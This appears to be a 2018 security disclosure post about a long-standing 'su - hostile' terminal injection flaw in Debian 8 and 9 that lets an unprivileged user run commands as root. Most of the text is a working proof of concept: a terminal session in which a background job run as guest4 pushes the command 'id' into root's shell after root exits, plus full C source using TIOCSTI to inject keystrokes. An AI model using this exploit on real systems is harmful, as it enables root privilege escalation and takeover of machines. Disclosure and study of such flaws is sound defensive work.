Wed Jun 13 12:25:34 EEST 2018

Ancient "su - hostile" vulnerability in debian 8 and 9

Ancient "su - hostile" vulnerability in debian 8 and 9

Just FYI.

Warning: This is rather old, since at least 2005, probably
much earlier. Check the links at:
http://www.openwall.com/lists/oss-security/2018/06/12/2

Summary: Doing "su - hostile" in debian 8 and 9 may lead
to root privilege escalation. Default sudo -u probably is
affected too.

Per chat with some admins they use su - user.

Session:

root@machine1:~# su - guest4
guest4@machine1:~$ (sleep 10; /tmp/a.out id) &
[1] 4737
guest4@machine1:~$ exit
logout
### just wait
root@machine1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@machine1:~# cat /tmp/tty.c 
/*
 *
 * https://unix.stackexchange.com/questions/48103/construct-a-command-by-putting-a-string-into-a-tty
 * */
#include <sys/ioctl.h>
#include <termios.h>
#include <stdio.h>
#include <stdlib.h>

void stackchar(char c)
{
  if (ioctl(0, TIOCSTI, &c) < 0) {
    perror("ioctl");
    exit(1);
  }
}
int main(int argc, char *argv[])
{
  int i, j;
  char c;

  for (i = 1; i < argc; i++) {
    for (j=0; (c = argv[i][j]); j++) {
      stackchar(c);
    }
    stackchar('\n');
  }
  exit(0);
}

Posted by su do we | Permanent link